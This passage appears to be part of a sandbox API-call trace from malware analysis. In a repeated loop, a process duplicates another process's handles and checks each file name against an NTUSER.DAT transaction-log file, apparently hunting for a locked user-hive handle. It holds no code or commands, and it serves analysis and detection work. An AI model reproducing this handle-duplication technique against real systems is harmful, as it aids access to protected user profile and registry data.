_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.025] CloseHandle (hObject=0x194) returned 1 [0163.025] CloseHandle (hObject=0x1e8) returned 1 [0163.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.025] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.025] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.026] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.026] CloseHandle (hObject=0x1e4) returned 1 [0163.026] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.026] CloseHandle (hObject=0x194) returned 1 [0163.026] CloseHandle (hObject=0x1e8) returned 1 [0163.026] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.026] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.027] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.028] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.028] CloseHandle (hObject=0x1e4) returned 1 [0163.028] CloseHandle (hObject=0x194) returned 1 [0163.028] CloseHandle (hObject=0x1e8) returned 1 [0163.028] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.028] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.028] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.030] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.034] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.034] CloseHandle (hObject=0x1e4) returned 1 [0163.034] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.034] CloseHandle (hObject=0x194) returned 1 [0163.034] CloseHandle (hObject=0x1e8) returned 1 [0163.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.034] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.035] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.036] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.036] CloseHandle (hObject=0x1e4) returned 1 [0163.036] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0163.036] CloseHandle (hObject=0x194) returned 1 [0163.036] CloseHandle (hObject=0x1e8) returned 1 [0163.036] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.036] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.036] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.037] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.038] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.038] CloseHandle (hObject=0x1e4) returned 1 [0163.038] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 2 [0163.038] CloseHandle (hObject=0x194) returned 1 [0163.038] CloseHandle (hObject=0x1e8) returned 1 [0163.038] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.038] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.038] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.039] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.040] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.040] CloseHandle (hObject=0x1e4) returned 1 [0163.040] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.040] CloseHandle (hObject=0x194) returned 1 [0163.040] CloseHandle (hObject=0x1e8) returned 1 [0163.040] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.040] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.041] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.041] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.042] CloseHandle (hObject=0x1e4) returned 1 [0163.042] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -15 [0163.042] CloseHandle (hObject=0x194) returned 1 [0163.042] CloseHandle (hObject=0x1e8) returned 1 [0163.042] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.042] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x948, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.043] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.044] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.044] CloseHandle (hObject=0x1e4) returned 1 [0163.044] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.044] CloseHandle (hObject=0x194) returned 1 [0163.044] CloseHandle (hObject=0x1e8) returned 1 [0163.044] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.044] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.045] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.046] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.046] CloseHandle (hObject=0x1e4) returned 1 [0163.046] CloseHandle (hObject=0x194) returned 1 [0163.046] CloseHandle (hObject=0x1e8) returned 1 [0163.046] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.046] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.047] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.048] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.048] CloseHandle (hObject=0x1e4) returned 1 [0163.048] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0163.048] CloseHandle (hObject=0x194) returned 1 [0163.048] CloseHandle (hObject=0x1e8) returned 1 [0163.048] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.048] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.049] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.050] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.050] CloseHandle (hObject=0x1e4) returned 1 [0163.050] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.050] CloseHandle (hObject=0x194) returned 1 [0163.050] CloseHandle (hObject=0x1e8) returned 1 [0163.050] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.050] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.050] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.051] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.054] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.054] CloseHandle (hObject=0x1e4) returned 1 [0163.054] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.054] CloseHandle (hObject=0x194) returned 1 [0163.054] CloseHandle (hObject=0x1e8) returned 1 [0163.054] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.054] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.055] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.056] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.056] CloseHandle (hObject=0x1e4) returned 1 [0163.056] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.056] CloseHandle (hObject=0x194) returned 1 [0163.056] CloseHandle (hObject=0x1e8) returned 1 [0163.056] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.056] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.057] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.058] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.058] CloseHandle (hObject=0x1e4) returned 1 [0163.058] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.058] CloseHandle (hObject=0x194) returned 1 [0163.058] CloseHandle (hObject=0x1e8) returned 1 [0163.058] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.058] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.064] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.065] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.065] CloseHandle (hObject=0x1e4) returned 1 [0163.065] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.065] CloseHandle (hObject=0x194) returned 1 [0163.065] CloseHandle (hObject=0x1e8) returned 1 [0163.065] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.066] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.067] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.067] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.067] CloseHandle (hObject=0x1e4) returned 1 [0163.068] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0163.068] CloseHandle (hObject=0x194) returned 1 [0163.068] CloseHandle (hObject=0x1e8) returned 1 [0163.068] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.068] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.068] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.069] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.069] CloseHandle (hObject=0x1e4) returned 1 [0163.069] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.069] CloseHandle (hObject=0x194) returned 1 [0163.070] CloseHandle (hObject=0x1e8) returned 1 [0163.070] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.070] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x121c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.070] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.071] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.071] CloseHandle (hObject=0x1e4) returned 1 [0163.071] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.071] CloseHandle (hObject=0x194) returned 1 [0163.071] CloseHandle (hObject=0x1e8) returned 1 [0163.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.071] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.072] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.073] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.073] CloseHandle (hObject=0x1e4) returned 1 [0163.073] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.073] CloseHandle (hObject=0x194) returned 1 [0163.073] CloseHandle (hObject=0x1e8) returned 1 [0163.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.073] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1234, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.074] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.075] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.075] CloseHandle (hObject=0x1e4) returned 1 [0163.075] CloseHandle (hObject=0x194) returned 1 [0163.075] CloseHandle (hObject=0x1e8) returned 1 [0163.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.075] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.076] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.077] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.077] CloseHandle (hObject=0x1e4) returned 1 [0163.077] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.077] CloseHandle (hObject=0x194) returned 1 [0163.077] CloseHandle (hObject=0x1e8) returned 1 [0163.077] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.077] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.078] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.083] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.084] CloseHandle (hObject=0x1e4) returned 1 [0163.084] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.084] CloseHandle (hObject=0x194) returned 1 [0163.084] CloseHandle (hObject=0x1e8) returned 1 [0163.084] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.084] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.085] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.086] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.086] CloseHandle (hObject=0x1e4) returned 1 [0163.086] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.086] CloseHandle (hObject=0x194) returned 1 [0163.086] CloseHandle (hObject=0x1e8) returned 1 [0163.086] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.086] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.087] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.088] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.088] CloseHandle (hObject=0x1e4) returned 1 [0163.088] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.088] CloseHandle (hObject=0x194) returned 1 [0163.088] CloseHandle (hObject=0x1e8) returned 1 [0163.088] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.088] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.089] WaitForSingleObject (hHandle=0x1e4, 